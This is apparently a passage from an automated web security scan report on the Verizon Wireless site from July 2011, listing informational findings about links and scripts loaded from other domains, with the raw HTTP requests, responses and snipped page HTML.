       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<a class="compareBox" rel="">
       <img class="pngOmit" src="http://cache.vzw.com/images_b2c/shared/trans.gif" />
       <span class="remove">
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/trade_in_program.png" alt="Trade&ndash;In Program" />
                       
                       </div>
...[SNIP]...
</div>

                               
                                                                                                                               <a name="&lid=Trade&amp;ndash;In Program" href="http://www.trade-in.vzw.com" title="Details" class="boldLink">Details</a>
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/20percent_off_accessories.png" alt="Up to 25% off Accessories" />
                       
                       </div>
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/free_act_special.png" alt="Free Activation" />
                       
                       </div>
...[SNIP]...
<noscript> <iframe src="https://fls.doubleclick.net/activityi;src=685973;type=vzwbu139;cat=vzwph183;ord=0123456789?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

3.8. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1311781870|check#true#1310572330|session#1310572240370-41417#1310574130; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 12:57:50 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 20770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="https://scache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="https://scache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="https://scache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

3.9. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPlanList&continue=true HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206241|session#1310993870949-319721#1310998501|check#true#1310996701; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:05 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 44786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                           <html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://cache.vzw.com/dwr/util.js'></script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
<a class="launchOverlay" href="/b2c/wishList?item=phoneFirst&amp;action=viewWishList" title="Wish List" style="display:inline !important;"><img src="http://cache.vzw.com/images_b2c/wishlist/wishlist.gif" alt="Wish List" style="display:inline !important; margin-top:15px;" /></a>
...[SNIP]...
<br />
<a href="http://support.vzw.com/capability/wifi_popup.html"
onclick="popUp(this.href,'popup',475,577);return false;">
Verizon Wi-Fi</a>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 9 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www.verizonwireless.com/b2c/dispatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/dispatcher

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /b2c/dispatcher HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/storelocator/index.jsp
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204318|session#1310993870949-319721#1310996578|check#true#1310994778; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY
Content-Type: application/x-www-form-urlencoded
Content-Length: 149

zipCode=10010&stateID=&action=DISPLAY&item=_STORE_SEARCH&stateName=&searchType=new&CURRENT_TYPE_LABEL=Verizon+Wireless+Stores&fromPage=searchForm.jsp

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:12:04 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 83915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


               <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

4.2. http://www.verizonwireless.com/b2c/explore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/explore/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/explore/ HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/dispatcher
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204334|session#1310993870949-319721#1310996594|check#true#1310994794; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:15:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 16721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/splashPageDB.js"></script>    
   <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/populateJSONWidgets.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/db.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/populateJSONPhoneFeature.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

4.3. http://www.verizonwireless.com/b2c/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/index.html?tab=myaccount HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203693|session#1310993870949-319721#1310995953|check#true#1310994153; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:11:19 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
